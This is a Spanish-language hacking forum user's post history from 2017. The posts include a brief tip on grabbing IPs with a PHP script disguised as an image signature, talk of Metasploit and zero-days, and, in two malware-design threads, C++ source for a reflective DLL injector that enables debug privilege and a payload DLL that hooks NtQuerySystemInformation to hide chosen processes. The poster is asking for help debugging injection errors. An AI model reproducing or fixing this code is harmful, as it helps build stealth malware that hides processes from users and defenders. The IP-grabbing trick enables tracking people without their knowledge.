| |
|
273
|
Seguridad Informática / Hacking / Re: !Se que torrents te has descargado¡
|
en: 21 Febrero 2017, 06:07 am
|
primero que nada, podrías redactar un poco más y se entendería (150 palabas y ni una coma) por otro lado si puedes un "exploit suficiente potente" (lo cual no se a que te refieres) podrías tener un "scanner de red suficiente potente" podrías escanear todas las ip validas en una cantidad de horas tolerables
me refería a esto: imaginense una falla tan grande como la que hay en xp pero en 7 y que funcionara en la ultima version actualizada, eso supondría un grave agujero de seguridad para microsoft. (en el caso de xp una de esas fallas sería netapi por ejemplo, pues una parecida para windows 7 en la última versión sería catastrófico) porque como cita el compañero facilmente uno puede obtener la ip. Y disculpa por mi manera de redactar, intentaré mejorarla! |
|
|
|
|
274
|
Programación / Programación C/C++ / Re: Recopilacion de Codigos C++
|
en: 21 Febrero 2017, 06:00 am
|
me parece muy buena idea  así tambien podemos aprender un poco más de todos modos existes snippets códigos de muchos ejemplos por internet pero aún así bien tener una recopilación útil para todos los que empezamos a querer aprender a programar. |
|
|
|
|
275
|
Seguridad Informática / Hacking / Re: !Se que torrents te has descargado¡
|
en: 21 Febrero 2017, 05:07 am
|
Y no obtendrás respuesta de vuelta....
Un tema interesante el tratado, pero como dice engel lex poco exprimible.
El tema de las IPs es algo que ya expuso nuestro compañero drvy y es algo que suele causar temor generalizado. El único peligro que tienen las IPs posiblemente sea en la Deep Web y aun ni con esas.
Obtener una IP es bastante sencillo, no lo dije con anterioridad, pero puesto que esta vez he argumentado más cosas, voy a exponer como sacar una IP:
Con un hosting y un php, modificas la cabecera del php al de una imagen, te lo pones de firma aquí mismo y wala.
Un saludo.
yo soy un ignorante respecto al tema de pentesting y redes, pero con una ip algo se puede hacer , por ejemplo con un xp sabiendo su ip puedes facilmente tomar el control del equipo. Al mismo tiempo sacar ip's es facil con un enlace o mandando un codigo puedes obtener un montón. Pero aún así es dificil hacer un ataque a gran escala a no ser que se contara con un exploit zero-day de los gordos (en el sentido de que se pudiera facilmente atacar un windows 7 o 10) lo cual lo dudo por el momento. En caso de tener los puertos abiertos y en escucha y hubieras arrancado algun servicio vulnerables probablemente pero aún así es muy dificil. Al final todo es automatizar es decir buscar el ataque más eficiente y más rapido no es lo mismo dedicarte 4 horas en tomar el control de tu ordenador de casa que hacerlo en un "plisplas" . En caso de haber alguien que cuente con un exploit suficientemente potente (un zero-day en el que se pudiera facilmente vulnerar de windows 7 para arriba un error nuevo desconocido) entonces probablemente saber la ip supondría un gran riesgo. Las probabilidades para un zero-day suelen ser pequeñas ,por ejemplo imaginense una falla tan grande como la que hay en xp pero en 7 y que funcionara en la ultima version actualizada eso supondría un grave agujero de seguridad para microsoft. |
|
|
|
|
276
|
Seguridad Informática / Bugs y Exploits / Re: aprender sobre metasploit
|
en: 20 Febrero 2017, 20:17 pm
|
Buenas no e llegado a probar armitage nunca contra android solo lo probé contra un windows xp de mi antiguo portatil, asi que solo puedo decirte de metasploit, ya que estuve utilizandolo, lo que mas te recomiendo es ver los modulos que tienes instalados ya que hay varios muy utiles contra android, y contra otros SO conocidos, no se si armitage te da la opción de crear tus propios modulos pero se que metasploit si
Te deseo mucha suerte
Un saludo y hasta otra  Armitage o cobalt strike son un poco más agradables a la vista a tener que interactuar solamente via comandos tu buscas la lista de exploits y aprendes a utilizarlos. Eso si todavía no he intentando y como tu dices mestasploit habría detenidamente los modulos en github y intentar hacer alguno para ver de q va el tema. A parte tendré ir probandolo ir buscando los servicios arrancados que sean inseguros etc peo quería algo orientarme entre tantos detalles ya que veo muchos explots pero más de la mitad no sé ni como utilizarlos y a parte de sacar servicios para poder entrar en Lan a mi telefono o mi otro pc etc |
|
|
|
|
277
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Al inyectar mi .dll devuelve error 87.
|
en: 20 Febrero 2017, 19:10 pm
|
con el ejemplo original funciona perfecto el problema es que estoy una dll propia y el ejemplo que puse le pasa una serie de argumentos a mi dll para que haga determinadas cosas. el problema esque estaba intentando en un ejemplo en concreto. En el caso que estaba intentando era un dll que lo que me hace es cargarme un payload pero no entiendo porque me devolvía error al cargarla trate de cambiarle el injector para que se pareciera más al del autor pero supongo que si no cargo correctamente mi dll no funciona ya que aunque lo cambie me devolvio otro error. mi dll será: // dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
#include "Payload.h"
#include "../Common/ArgumentsPassing.h"
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
pArgStruct args = (pArgStruct)lpReserved;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
if (!isUp)
{
#ifdef DEBUG_MODE
PrintToFile("Injected!");
#endif // DEBUG
isUp = true;
InitializeDLL(args);
}
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
isUp = false;
UnhookDLL();
break;
}
return TRUE;
}
la funcion initializedll es la que me inicia la dll con sus argumentos: void InitializeDLL(pArgStruct args)
{
NtHookEngineInit();
hMutex = CreateMutex(0, TRUE, NULL);
if (args == NULL)
{
TCHAR pIDsbuff[MAX_LINE], procNameBuff[MAX_LINE];
FILE *fp;
fopen_s(&fp, INFO_TRANSFER_FILE, "r");
fgetws(pIDsbuff, MAX_LINE, fp); //first line - list of pIDs to hide
fgetws(procNameBuff, MAX_LINE, fp); //second line - list of process names to hide
pIDsbuff[wcslen(pIDsbuff) - 1] = '\0'; //delete \n
procNameBuff[wcslen(procNameBuff) - 1] = '\0';
fclose(fp);
PIDsNum = buildPIDsList(pIDsbuff, FALSE, &hiddenPIDsList);
procNameNum = buildProcNameList(procNameBuff, FALSE, &hiddenProcessNames);
}
else
{
procNameNum = buildProcNameList(args->procNames, FALSE, &hiddenProcessNames);
PIDsNum = args->pIDsNum;
int hiddenPIDsListSize = sizeof(int)*PIDsNum;
hiddenPIDsList = (int *)malloc(hiddenPIDsListSize);
memcpy_s(hiddenPIDsList, hiddenPIDsListSize, args->pIDs, sizeof(int)*args->pIDsNum);
#ifdef DEBUG_MODE
PrintToFile("Line:");
for (int i = 0; i < procNameNum; i++)
PrintToFile(hiddenProcessNames[i]);
PrintToFile("PIDs:");
for (int i = 0; i < args->pIDsNum; i++)
{
char intbuf[10];
_itoa_s(hiddenPIDsList[i], intbuf, 10, 10);
PrintToFile(intbuf);
}
#endif // DEBUG_MODE
}
OrigAddress = (PNtQueryFunc)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation");
BOOL hookres = HookFunction((ULONG_PTR)OrigAddress, (ULONG_PTR)&HookedNtQuerySystemInformation);
#ifdef DEBUG_MODE
if (!hookres)
PrintToFile("Hook Failed!");
#endif
RealNTQueryFunc = (PNtQueryFunc)GetOriginalFunction((ULONG_PTR)HookedNtQuerySystemInformation);
ReleaseMutex(hMutex);
} En resumidas cuentas el ejemplo del hello world funciona de rechupete pero en el ejemplo que intento me da Failed to inject the DLL y dependiendo de los cambios que haga en el inyector varía el error, osea primero me daba error 87, si actualizo el inyector al del autor stephenfewer me devuelve error 32 por lo que supongo que habrá algo en el código que hace que no se cargue correctamente mi dll. |
|
|
|
|
278
|
Foros Generales / Sugerencias y dudas sobre el Foro / Mejorar la apariencia del código
|
en: 20 Febrero 2017, 16:37 pm
|
Bueno es una pequeña sugerencia tal vez erronea por mi parte pero la hago cambiar los cuadros del codigo para que sean mas agradables a la vista o al menos que cada línea pueda enumerarse con un numero pulsando un view ejemplo: Clásico: Este es un ejemplo de codigo Diferente(en la esquina un view para enumerarlo: 1. Este es un ejemplo de codigo
2.numerado pulsando el boton switch
3.#los comentarios con colorines Y el color en comentarios. no se tal vez sea error por mi parte sería algo como hacerlo más comprensible o más agradable para que la gente pueda entender mejor ya que a veces una imagen vale mas que mil palabras. es solo una sugerencia tal vez innecesario grax. |
|
|
|
|
279
|
Seguridad Informática / Análisis y Diseño de Malware / Al inyectar mi .dll devuelve error 87.
|
en: 20 Febrero 2017, 16:30 pm
|
Hola estoy intentando inyectar mi .dll, el problema reside cuando hago la inyección loadlibrary no carga mi dll. Esta sería la función que invoco para hacer mi inyección: Esta sería la función que invoco para hacer mi inyección: BOOL InjectorFunc(DWORD dwProcessId, BOOL isTarget64Bit)
{
HANDLE hFile = NULL;
HANDLE hModule = NULL;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
LPVOID lpBuffer = NULL;
DWORD dwLength = 0;
DWORD dwBytesRead = 0;
TOKEN_PRIVILEGES priv = { 0 };
do
{
dwLength = isTarget64Bit ? x64PayloadSize : x86PayloadSize;
if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
BREAK_WITH_ERROR("Failed to get the DLL file size");
lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
if (!lpBuffer)
BREAK_WITH_ERROR("Failed to get the DLL file size");
if(0!=memcpy_s(lpBuffer, dwLength, isTarget64Bit ? x64PayloadByteArr : x86PayloadByteArr, isTarget64Bit ? x64PayloadSize : x86PayloadSize))
BREAK_WITH_ERROR("Failed to copy buffer!");
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL);
CloseHandle(hToken);
}
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId);
if (!hProcess)
BREAK_WITH_ERROR("Failed to open the target process");
hModule = LoadRemoteLibraryR(hProcess, lpBuffer, dwLength,&argsToDLL);
if (!hModule)
BREAK_WITH_ERROR("Failed to inject the DLL");
TCHAR cpDllFile[DLL_NAME_LENGTH];
wcscpy_s(cpDllFile, DLL_NAME_LENGTH, isTarget64Bit ? x64PayloadName: x86PayloadName);
printf("[+] Injected the '%ws' DLL into process %d.\n", cpDllFile, dwProcessId);
WaitForSingleObject(hModule, -1);
} while (0);
if (lpBuffer)
HeapFree(GetProcessHeap(), 0, lpBuffer);
if (hProcess)
CloseHandle(hProcess);
return TRUE;
} Y me hace break como cito en el código y me devuelve error 87. Failed to inject the DLL. Error=87 |
|
|
|
|
|
| |
|
Mostrar Mensajes
